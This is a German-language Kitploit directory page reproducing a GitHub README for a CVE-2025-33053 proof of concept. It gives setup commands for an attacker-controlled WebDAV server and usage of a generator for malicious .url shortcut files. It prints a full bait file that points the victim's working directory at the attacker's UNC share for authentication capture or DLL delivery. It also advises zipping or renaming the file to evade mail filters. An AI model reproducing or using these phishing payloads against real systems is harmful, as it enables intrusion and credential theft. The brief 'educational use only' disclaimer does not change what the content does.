Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Proof Of Concept (PoC) | Kitploit
Tools/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Payload GenerationExploitationLateral MovementPhishingWeb SecurityPenetration TestingCommand and ControlSocial EngineeringRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Proof Of Concept (PoC)

Repository anzeigen
6416vor 1 JahrVon Kitploit geprüft

CVE-2025-33053 Proof Of Concept

Dieses Repository stellt Skripte bereit, um automatisch einen WebDAV-Server auf Ubuntu mit Apache2 bereitzustellen und bösartige .url-Verknüpfungsdateien für Phishing, Red Teaming oder Simulation von Lateral Movement zu generieren.


📁 Inhalt

  • setup_webdav.sh – Bash-Skript zur Konfiguration von Apache2 + WebDAV.
  • setup_webdav.py – Python-Version des obigen.
  • gen_url.py – Python-Skript zum Generieren von .url-Verknüpfungsdateien mit UNC/WebDAV-Pfaden.
  • README.md – Dokumentation.

🔧 Voraussetzungen

  • Betriebssystem: Ubuntu 20.04 oder neuer (Debian-kompatibel)
  • Root-Rechte (sudo)
  • Python 3.x

🚀 Setup-Anleitung

1. WebDAV-Server (via Bash)

root@kitploit:~
sudo bash setup_webdav.sh

Oder mit Python:

root@kitploit:~
sudo python3 setup_webdav.py

Standardmäßig führt das Skript Folgendes aus:

  • Apache und erforderliche WebDAV-Module installieren.
  • Ein gemeinsames Verzeichnis unter /var/www/webdav erstellen.
  • Die Module DAV und DAV_FS aktivieren.
  • Ein DavLockDB-Verzeichnis erstellen (um Apache-DAV-Sperrfehler zu vermeiden).
  • Den Apache-Dienst neu starten.

📎 WebDAV-Pfad: http://<your-ip>/webdav/


💣 Generieren einer bösartigen .url-Verknüpfung

Beispielverwendung:

root@kitploit:~
python3 gen_url.py --ip 192.168.1.100 --out doc.url

Alle Optionen:

root@kitploit:~
python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

Dies erzeugt eine .url-Datei wie folgt:

root@kitploit:~
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 Ein Klick auf diese Datei (in bestimmten Konfigurationen) kann dazu führen, dass das Zielsystem automatisch eine Verbindung zu Ihrem WebDAV-Server herstellt (Authentifizierung oder DLL-Lieferung).


🔒 Hinweise für Sicherheitstests

  • Firewall deaktivieren (oder Port 80 öffnen) , wenn Sie in einem lokalen Netzwerk testen:
    root@kitploit:~
    sudo ufw allow 80
    
  • .url-Dateien werden je nach Konfiguration möglicherweise nicht wie erwartet ausgeführt:
    • Gruppenrichtlinieneinschränkungen
    • Standardanwendungen
    • E-Mail-Client (Gmail könnte sie bereinigen)
  • Möglicherweise müssen Sie .url zippen oder in .txt umbenennen, um Filter zu umgehen.

⚠️ Rechtlicher Hinweis

Dieses Repository ist nur für Bildungszwecke und autorisierte Penetrationstests bestimmt.
Verwenden Sie diese Skripte nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.


🧠 Referenzen

  • WebDAV-Server-Setup - LinuxConfig.org
  • WebDAV Apache-Konfiguration - Peter Girnus
  • Microsoft WebDAV-Dokumentation

📬 Kontakt

Bei Fragen oder Anfragen zu ethischen Red-Teaming-Aktivitäten wenden Sie sich bitte über GitHub Issues.

Tool herunterladen